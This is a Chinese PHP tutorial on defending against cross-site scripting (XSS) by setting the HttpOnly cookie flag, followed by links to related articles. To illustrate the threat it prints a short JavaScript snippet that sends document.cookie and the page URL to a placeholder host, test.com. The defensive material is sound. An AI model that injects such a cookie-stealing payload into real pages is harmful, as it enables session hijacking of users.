xss防御之php利用httponly防xss攻擊

更新時間：2014年03月21日 16:24:02 作者：

這篇文章主要介紹了xss防御之php利用httponly防xss攻擊,下面是PHP設(shè)置HttpOnly的方法,需要的朋友可以參考下

xss的概念就不用多說了，它的危害是極大的，這就意味著一旦你的網(wǎng)站出現(xiàn)xss漏洞，就可以執(zhí)行任意的js代碼,最可怕的是攻擊者利用js獲取cookie或者session劫持，如果這里面包含了大量敏感信息（身份信息，管理員信息）等，那完了。。。

如下js獲取cookie信息：

復(fù)制代碼代碼如下:

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是從document對象中獲取的，現(xiàn)在瀏覽器在設(shè)置Cookie的時候一般都接受一個叫做HttpOnly的參數(shù)，跟domain等其他參數(shù)一樣，一旦這個HttpOnly被設(shè)置，你在瀏覽器的document對象中就看不到Cookie了。

PHP設(shè)置HttpOnly：

復(fù)制代碼代碼如下:

//在php.ini中，session.cookie_httponly = ture 來開啟全局的Cookie的HttpOnly屬性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七個參數(shù)設(shè)置為true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

對于PHP5.1以前版本的PHP通過：

復(fù)制代碼代碼如下:

header("Set-Cookie: hidden=value; httpOnly");

最后，HttpOnly不是萬能的！

您可能感興趣的文章:

相關(guān)文章

用PHP實現(xiàn)的生成靜態(tài)HTML速度快類庫
用PHP實現(xiàn)的生成靜態(tài)HTML速度快類庫...
2007-03-03
php格式化金額函數(shù)分享
這篇文章主要介紹了php格式化金額函數(shù)分享,需要的朋友可以參考下
2015-02-02
PHP實現(xiàn)一個多功能購物網(wǎng)站的案例
下面小編就為大家?guī)硪黄狿HP實現(xiàn)一個多功能購物網(wǎng)站的案例。小編覺得挺不錯的，現(xiàn)在就分享給大家，也給大家做個參考。一起跟隨小編過來看看吧
2017-09-09
Joomla數(shù)據(jù)庫操作之JFactory::getDBO用法
這篇文章主要介紹了Joomla數(shù)據(jù)庫操作之JFactory::getDBO用法,實例分析了Joomla靜態(tài)類JFactory使用getDBO取得數(shù)據(jù)庫對象的相關(guān)操作技巧,需要的朋友可以參考下
2016-05-05
Ecshop 后臺添加新功能欄目及管理權(quán)限設(shè)置教程
這篇文章主要介紹了Ecshop 后臺添加新功能欄目及管理權(quán)限設(shè)置教程,需要的朋友可以參考下
2017-11-11
CodeIgniter中使用Smarty3基本配置
這篇文章主要介紹了CodeIgniter中使用Smarty3基本配置,本文給出了創(chuàng)建類庫的方法和控制器中調(diào)用實例,這樣就可以完整的使用Smarty了,需要的朋友可以參考下
2015-06-06
tp5框架前臺無限極導(dǎo)航菜單類實現(xiàn)方法分析
這篇文章主要介紹了tp5框架前臺無限極導(dǎo)航菜單類實現(xiàn)方法,結(jié)合實例形式分析了tp5框架前臺無限極導(dǎo)航菜單類實現(xiàn)原理、步驟與操作注意事項,需要的朋友可以參考下
2020-03-03
PHP和javascript常用正則表達(dá)式及用法實例
這篇文章主要介紹了常用的PHP和javascript正則表達(dá)式及用法實例,精心收集的PHP和javascript正則表達(dá)式各10個,需要的朋友可以參考下
2014-07-07
thinkphp配置文件路徑的實現(xiàn)方法
下面小編就為大家?guī)硪黄猼hinkphp配置文件路徑的實現(xiàn)方法。小編覺得挺不錯的，現(xiàn)在就分享給大家，也給大家做個參考。一起跟隨小編過來看看吧
2016-08-08
php多文件上傳實現(xiàn)代碼
這篇文章主要介紹了php多文件上傳實現(xiàn)代碼,需要的朋友可以參考下
2014-02-02